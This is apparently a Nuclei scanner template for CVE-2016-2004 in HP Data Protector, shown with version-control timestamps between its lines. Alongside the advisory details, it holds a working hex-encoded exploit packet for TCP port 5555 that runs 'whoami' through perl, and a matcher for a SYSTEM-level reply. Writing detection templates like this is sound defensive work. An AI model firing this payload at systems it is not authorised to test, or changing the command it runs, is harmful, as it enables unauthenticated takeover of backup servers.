2021-08-18 11:37:49 +00:00
id : CVE-2016-2004
info :
2022-05-11 07:58:51 +00:00
name : HP Data Protector - Arbitrary Command Execution
2021-08-18 11:37:49 +00:00
author : pussycat0x
severity : critical
description : HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
2023-09-06 13:28:19 +00:00
remediation : |
Upgrade to the most recent version of HP Data Protector.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
2022-05-17 09:18:12 +00:00
- http://www.kb.cert.org/vuls/id/267328
- https://www.exploit-db.com/exploits/39858/
2023-07-16 13:29:08 +00:00
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-2004
cwe-id : CWE-306
2024-03-04 08:20:22 +00:00
epss-score : 0.12552
epss-percentile : 0.95291
2023-07-16 13:29:08 +00:00
cpe : cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-16 13:29:08 +00:00
vendor : hp
product : data_protector
2024-06-07 10:04:29 +00:00
tags : packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp
2023-04-27 04:28:59 +00:00
tcp :
2023-07-16 13:29:08 +00:00
- host :
2021-08-18 11:37:49 +00:00
- "{{Hostname}}"
2022-01-07 07:28:37 +00:00
- "{{Host}}:5555"
2023-07-16 13:29:08 +00:00
inputs :
- data : "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
type : hex
2021-08-18 11:37:49 +00:00
matchers :
- type : word
encoding : hex
words :
- "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402207046969da28fc75542becf1938f21d6cc0fad5e8bd2bfdd7993f31513f3458a5022017a5f1db732389f1dd68eb303a432c087e77f142c1eb5fe007d98f9f0b42eca4:922c64590222798bb761d5b6d8e72950